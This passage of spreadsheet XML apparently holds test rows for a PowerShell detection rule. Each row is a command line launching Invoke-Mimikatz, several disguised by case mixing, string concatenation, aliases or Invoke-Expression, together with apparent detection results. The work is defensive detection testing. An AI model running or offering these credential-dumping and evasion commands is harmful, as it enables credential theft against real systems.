          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D931" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E931" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F931" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G931" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H931" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I931" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J931" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K931" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="932" ht="15.75" customHeight="1" s="42">
      <c r="A932" s="43" t="n"/>
      <c r="B932" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C932" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D932" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E932" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F932" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G932" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H932" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I932" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J932" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K932" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="933" ht="15.75" customHeight="1" s="42">
      <c r="A933" s="43" t="n"/>
      <c r="B933" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C933" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D933" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E933" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H933" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I933" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J933" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K933" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="934" ht="15.75" customHeight="1" s="42">
      <c r="A934" s="43" t="n"/>
      <c r="B934" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C934" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D934" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E934" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F934" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G934" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H934" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I934" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J934" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K934" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="935" ht="15.75" customHeight="1" s="42">
      <c r="A935" s="43" t="n"/>
      <c r="B935" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C935" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D935" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E935" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H935" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I935" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J935" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K935" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="936" ht="15.75" customHeight="1" s="42">
      <c r="A936" s="43" t="n"/>
      <c r="B936" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C936" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D936" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E936" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G936" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H936" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93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36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K936" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="937" ht="15.75" customHeight="1" s="42">
      <c r="A937" s="43" t="n"/>
      <c r="B937" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C937" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D937" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E937" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G937" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H937" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93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37" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K937" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="938" ht="15.75" customHeight="1" s="42">
      <c r="A938" s="43" t="n"/>
      <c r="B938" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C938" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D938" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E938" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G938" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H938" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93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38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K938" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="939" ht="15.75" customHeight="1" s="42">
      <c r="A939" s="43" t="n"/>
      <c r="B939" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C939" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D939" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E939" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G939" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H939" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K939" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="940" ht="15.75" customHeight="1" s="42">
      <c r="A940" s="43" t="n"/>
      <c r="B940" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C940" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D940" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E940" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H940" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I940" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J940" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K940" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="941" ht="15.75" customHeight="1" s="42">
      <c r="A941" s="43" t="n"/>
      <c r="B941" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C941" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D941" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E941" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H941" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I941" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J941" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K941" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="942" ht="15.75" customHeight="1" s="42">
      <c r="A942" s="43" t="n"/>
      <c r="B942" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C942" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D942" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E942" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H942" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I942" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J942" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K942" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="943" ht="15.75" customHeight="1" s="42">
      <c r="A943" s="43" t="n"/>
      <c r="B943" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C943" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D943" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E943" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F943" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G943" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H943" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I943" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J943" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K943" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="944" ht="15.75" customHeight="1" s="42">
      <c r="A944" s="43" t="n"/>
      <c r="B944" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C944" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D944" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E944" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F944" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G944" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H944" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I944" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J944" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K944" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="945" ht="15.75" customHeight="1" s="42">
      <c r="A945" s="43" t="n"/>
      <c r="B945" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C945" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D945" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E945" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F945" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G945" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H945" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94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45" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K945" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="946" ht="15.75" customHeight="1" s="42">
      <c r="A946" s="43" t="n"/>
      <c r="B946" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C946" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D946" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E946" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F946" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G946" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H946" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9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46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K946" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="947" ht="15.75" customHeight="1" s="42">
      <c r="A947" s="43" t="n"/>
      <c r="B947" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C947" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D947" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E947" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F947" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G947" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H947" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94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47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K947" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="948" ht="15.75" customHeight="1" s="42">
      <c r="A948" s="43" t="n"/>
      <c r="B948" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C948" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D948" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E948" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F948" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G948" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H948" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94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48" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K948" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="949" ht="15.75" customHeight="1" s="42">
      <c r="A949" s="43" t="n"/>
      <c r="B949" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C949" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D949" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E949" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G949" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H949" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94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49" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K949" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="950" ht="15.75" customHeight="1" s="42">
      <c r="A950" s="43" t="n"/>
      <c r="B950" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C950" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D950" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E950" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F950" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I95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0" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K950" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="951" ht="15.75" customHeight="1" s="42">
      <c r="A951" s="43" t="n"/>
      <c r="B951" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C951" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D951" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E951" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F951" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G951" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H951" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K951" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="952" ht="15.75" customHeight="1" s="42">
      <c r="A952" s="43" t="n"/>
      <c r="B952" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C952" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D952" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E952" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F952" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G952" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H952" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K952" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="953" ht="15.75" customHeight="1" s="42">
      <c r="A953" s="43" t="n"/>
      <c r="B953" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C953" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D953" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E953" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F953" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G953" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H953" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K953" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="954" ht="15.75" customHeight="1" s="42">
      <c r="A954" s="43" t="n"/>
      <c r="B954" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C954" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D954" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E954" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F954" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G954" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H954" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K954" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="955" ht="15.75" customHeight="1" s="42">
      <c r="A955" s="43" t="n"/>
      <c r="B955" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C955" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D955" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E955" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F955" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G955" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H955" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K955" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="956" ht="15.75" customHeight="1" s="42">
      <c r="A956" s="43" t="n"/>
      <c r="B956" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C956" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D956" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E956" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F956" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G956" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H956" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K956" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="957" ht="15.75" customHeight="1" s="42">
      <c r="A957" s="43" t="n"/>
      <c r="B957" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C957" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D957" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E957" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F957" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G957" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H957" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K957" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="958" ht="15.75" customHeight="1" s="42">
      <c r="A958" s="43" t="n"/>
      <c r="B958" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C958" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D958" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E958" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F958" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G958" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H958" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K958" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="959" ht="15.75" customHeight="1" s="42">
      <c r="A959" s="43" t="n"/>
